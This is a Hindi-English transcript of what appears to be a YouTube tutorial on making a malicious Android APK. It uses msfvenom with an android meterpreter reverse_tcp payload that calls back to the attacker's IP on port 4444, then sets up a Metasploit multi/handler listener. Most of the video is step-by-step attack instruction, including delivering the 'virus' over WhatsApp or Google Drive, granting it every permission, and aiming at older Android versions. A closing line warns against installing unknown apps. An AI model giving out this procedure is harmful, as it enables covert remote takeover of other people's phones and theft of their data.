हेलो एवरीवन, आज की इस वीडियो में हम मेटास्प्लॉइट टूल का यूज़ करेंगे इन अवर काली लिनक्स ऑपरेटिंग सिस्टम एंड यहाँ पे हम प्रैक्टिकली पेनिट्रेशन टेस्टिंग को परफॉर्म करेंगे इन अवर एंड्रॉयड डिवाइस। बेसिकली यहाँ पे काली लिनक्स ऑपरेटिंग सिस्टम में हम एक MSF वेनम बनाएंगे, अ काइंड ऑफ वायरस, बाय यूजिंग मेटास्प्लॉइट फ्रेमवर्क। एंड जब हम उस APK वायरस को किसी भी एंड्रॉयड डिवाइस में इंस्टॉल करेंगे, देन उस एंड्रॉयड डिवाइस का जो एक्सेस है वो हमारे काली लिनक्स की मशीन पे आ जाएगा। सो उसी चीज़ को हम यहाँ पे प्रैक्टिकली अंडरस्टैंड करेंगे। फर्स्ट ऑफ ऑल यहाँ पे हमें टर्मिनल को ओपन करना है एंड अपने सिस्टम को अपडेट एंड अपग्रेड करना है। sudo apt update and sudo apt/y full upgrade and then enter। पासवर्ड यहाँ पे एंटर कर देना एंड हमारा सिस्टम सक्सेसफुली अपडेट एंड अपग्रेड हो जाएगा। आपको यहाँ थोड़ा टाइम देना है ताकि सारे लेटेस्ट पैकेट्स यहाँ पे इंस्टॉल हो जाएं। एज यू कैन सी यहाँ पे सभी लेटेस्ट पैकेट्स इंस्टॉल हो गए हैं एंड हमारा सिस्टम अपडेट हो गया है। अब हमें यहाँ पे एक एंड्रॉयड डिवाइस को लाना पड़ेगा फॉर टेस्टिंग। आप यहाँ पे एक स्पेयर एंड्रॉयड डिवाइस को यूज़ कर सकते हैं। नाउ अब यहाँ पे हम जनरेट करेंगे मलेशियस APK को। उसके लिए हम यहाँ पे MSF कंसोल टाइप करेंगे एंड हमारा मेटास्प्लॉइट का जो फ्रेमवर्क है वो यहाँ पे ओपन हो जाएगा। अगर आपको यहाँ पे कुछ भी एरर आता है, देन आपको मेक श्योर करना है कि आपके सिस्टम में मेटास्प्लॉइट का जो फ्रेमवर्क है वो इंस्टॉल है या नहीं। अगर वो इंस्टॉल नहीं है देन आप उसको इंस्टॉल कर सकते हो, देन उसके बाद ये प्रोसेस आप यहाँ पे कर सकते हो। सो एज यू सी यहाँ पे हमारा जो मेटास्प्लॉइट का फ्रेमवर्क है वो सक्सेसफुली ओपन हो गया। यहाँ पे हम एक वेनम क्रिएट करेंगे। हम यहाँ पे टाइप करेंगे MSF venom/p android/ meterpredator/ reverse TCP। lhost, हम यहाँ पे अपने सिस्टम का lhost डालेंगे। यहाँ पे हम एक न्यू टर्मिनल को ओपन करेंगे एंड यहाँ पे कमांड डालेंगे ifconfig। यहाँ पे बेसिकली हमारे सिस्टम का IP एड्रेस आ जाएगा Ethernet 0 पे। इसे हम यहाँ पे कॉपी कर लेंगे एंड यहाँ पे lhost में पेस्ट कर देंगे। पेस्ट करने के बाद यहाँ पे स्पेस देना है एंड lport यहाँ पे डालना है। lport यहाँ पे हमारा डिफ़ॉल्ट आएगा 4 4 4 एंड 4, देन /o एंड यहाँ पे हमें वो डायरेक्टरी डालनी है जहाँ पे हमारी ये APK फाइल सेव होगी। /tmp/ फाइल का नाम virus.apk। हमारी ये फाइल यहाँ पे इस डायरेक्टरी में सेव होगी एंड यहाँ पे आप यहाँ पे APK फाइल को चेंज भी कर सकते हो। लाइक अब यहाँ पे APK फाइल का नेम यहाँ पे आप चेंज कर सकते हो। ये पूरी कमांड डालने के बाद यहाँ पे हम एंटर प्रेस करेंगे एंड यहाँ पे थोड़ा टाइम लेगा एंड हमारी APK फाइल को जनरेट कर देगा। एज यू कैन सी यहाँ पे हमारा पेलोड जनरेट हो गया। लाइक हमारी फाइल इतने बाइट्स की वो फाइल है एंड वो इस डायरेक्टरी में जाके सेव हो चुकी है। लेट मी शो यू। यहाँ पे हम फाइल सिस्टम पे जाएंगे एंड काली पे, कंप्यूटर्स पे, फाइल सिस्टम एंड यहाँ पे TMP वाले फोल्डर पे जाएंगे। यहाँ पे हमारी वायरस APK फाइल क्रिएट हो गई है। अब आपको इस APK फाइल को अपने फ़ोन में ट्रांसफ़र करना है। उसके लिए आप यहाँ पे WhatsApp का यूज़ कर सकते हैं और आप यहाँ पे गूगल ड्राइव का, गूगल लिंक का यूज़ कर सकते हैं। उसके थ्रू आपको अपने फ़ोन में इस वायरस को डालना पड़ेगा। आपको यहाँ पे इस वायरस को सिर्फ शेयर करना है, अभी इसको इंस्टॉल नहीं करना है। इंस्टॉल करने से पहले हम यहाँ पे और भी कमांड्स डालेंगे। लाइक अगेन हम अपना टर्मिनल ओपन कर लेंगे एंड फाइल को जनरेट करने के बाद यहाँ पे हम सेटअप करेंगे फॉर द लिसनर। यहाँ पे हम कमांड डालेंगे यूज़ exploit /
multi/handler, use exploit/multi/handler, इसे यहाँ पे एंटर कर देंगे। एज यू कैन सी यहाँ पे हम एक्सप्लॉइट मल्टी हैंडलर इसके अंदर एंटर कर चुके हैं एंड यहाँ पे हम अपने पेलोड को वापस से सेट करेंगे। सेट पेलोड Android/meterpredator /reverse/TCP। जो पेलोड यहाँ पे आपने ऊपर क्रिएट किया था उसी सेम पेलोड का आपको यहाँ पे नाम लिखना है एंड आपको ये एकदम करेक्ट वे में लिखना है एंड देन यहाँ पे एंटर प्रेस करेंगे। हमारे यहाँ पे पेलोड सेलेक्टेड हो चुका है। अब यहाँ पे हम एल होस्ट को सिलेक्ट करेंगे। सो यहाँ पे पेलोड को सिलेक्ट करने के बाद यहाँ पे आपको एल होस्ट को डालना है। आपको यहाँ पे कमांड लिखनी है सेट एल होस्ट एंड अपना IP एड्रेस जो कि आपने MSF Venom के अंदर डाला था एंड यहाँ पे आपको एंटर प्रेस करना है। एल होस्ट यहाँ पे आपका सिलेक्ट हो गया। नाउ अब आपको यहाँ पे एल पोर्ट को डालना है। सेट एल पोर्ट डिफॉल्ट 444 and 4 एंड देन एंटर। जब आप इन सारी इन्फॉर्मेशन को यहाँ पे डाल दोगे आपकी मशीन एकदम रेडी हो जाएगी। इन सब चीज़ों को डालने के बाद जो APK फाइल आपने अपने एंड्रॉयड सिस्टम में ट्रांसफ़र की है आपको उसको इंस्टॉल करना है एंड इंस्टॉल करने के बाद सारी परमिशंस वहाँ पे अलो करनी है एंड सारी परमिशंस को अलो करने के बाद यहाँ पे आपको एक्सप्लॉइट पे क्लिक करना है। यहाँ पे आपको एक्सप्लॉइट कमांड डालनी है एंड यहाँ पे एंटर प्रेस करना है। एंटर प्रेस करने के बाद यहाँ पे ये सेशन स्टार्ट हो जाएगा। यहाँ पे आपको थोड़ा वेट करना है एंड जो आपकी डिवाइस का एक्सेस है वो यहाँ पे शो हो जाएगा। बट इसके आगे मैं आपको यहाँ पे नहीं दिखा सकता हूँ बिकॉज ऑफ यूट्यूब कम्युनिटी गाइडलाइंस। बट मैंने आपको यहाँ पे पूरा प्रोसेस दिखा दिया है। सो इसी प्रोसेस को आप सेम वे में परफॉर्म कर सकते हैं अपने एंड्रॉयड डिवाइस का एक्सेस लेने के लिए। बट लेट मी टेल यू समथिंग, अगर आपको ये प्रोसेस सक्सेसफुल वे में परफॉर्म करना है देन आपको ओल्ड डिवाइस को यूज़ करना पड़ेगा जिसमें Android 6, Android 7, Android 8 ये सारे एंड्रॉयड के वर्जन्स होंगे। बट अगर आप इसको Android 15 पे करेंगे, Android 14 पे करेंगे देन वहाँ पे सिक्योरिटी बहुत ज़्यादा हाई होती है। सो वहाँ पे ये चीज़ वर्क नहीं करेगी। आपके ओल्ड डिवाइसेस में ये चीज़ें वर्क कर जाएंगी एंड यहाँ पे एक्सेस लेने के बाद ये सभी कमांड्स आपको यहाँ पे शो हो रही होंगी। इन कमांड्स का यूज़ करके आप अपने डिवाइस के साथ इंटरेक्शन कर सकते हो लाइक अपने Kali Linux सिस्टम के ऊपर से। सो इन दिस वे हैकर्स एंड अटैकर्स हमारे सिस्टम को एक्सप्लॉइट करते हैं एंड हमारे सिस्टम का एक्सेस लेते हैं। दैट्स वाई हमें किसी भी अननोन एप्लीकेशन को अपने एंड्रॉयड सिस्टम में इंस्टॉल नहीं करना चाहिए। हमें अपनी सिक्योरिटी खुद ही मेंटेन रखनी चाहिए। I hope you found this video really informative and helpful for you. And for more cybersecurity content, you may subscribe to CWE. Thank you.